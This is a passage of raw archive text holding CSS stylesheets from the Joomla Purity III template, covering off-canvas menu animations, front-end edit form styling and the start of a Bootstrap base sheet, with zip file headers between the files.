  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffffff;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #e67a00;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ff8800;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #b35f00;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKӜ�\�Xl�}H}H.purity_iii/css/themes/orange/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: left;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-left: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-left: 0;
  margin-right: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: left;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: left;
  margin-right: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  left: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: left;
  padding-left: 10px !important;
  padding-right: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  left: auto;
  right: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\���ll*purity_iii/css/themes/orange/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ff8800;
  text-decoration: none;
}
a:hover,
a:focus {
